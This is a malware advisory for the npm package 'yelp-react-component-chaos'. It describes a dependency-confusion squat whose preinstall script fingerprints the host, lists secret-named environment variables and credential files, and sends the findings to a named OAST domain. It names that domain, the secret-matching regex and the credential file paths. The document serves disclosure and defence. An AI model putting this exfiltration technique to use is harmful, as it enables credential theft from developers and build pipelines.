MAL-2026-5515

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (711cd262cc670c0e66cf2878b6fa22db21a2e420313a58aa029cbc619f2b27cc) On `npm install`, preinstall.js collects hostname, username, cwd, network interfaces, and the names of environment variables matching /TOKEN|SECRET|PASSWORD|KEY|AUTH|NPM|AWS|GITHUB|YELP|DATABASE/i, then probes for the existence and sizes of ~/.npmrc, ~/.gitconfig, ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.aws/credentials, ~/.env, ~/.netrc, and ~/.docker/config.json. The collected payload is POSTed via curl to http://3w0e8s6jg6tkyv03vdesvscvlmrdf43t.oastify.com (a Burp Collaborator OAST domain) over plain HTTP. The payload self-identifies with `attack: 'dependency-confusion-yelp'` and the package name `yelp-react-component-chaos` impersonates Yelp's internal React tooling namespace, indicating a dependency-confusion squat against Yelp's private registry. Any developer or CI pipeline that resolves this name from public npm has their host fingerprinted and their installer-credential file inventory reported off-host, enabling targeted follow-on theft.

## Source: ossf-package-analysis (888a90bd95ca140a3cc5946c0f1a7bf5b52f04ac2f7732722de7db72ec409801) The OpenSSF Package Analysis project identified 'yelp-react-component-chaos' @ 8.14.5 (npm) as malicious.

It is considered malicious because:

- The package communicates with a domain associated with malicious activity.

- The package executes one or more commands associated with malicious behavior.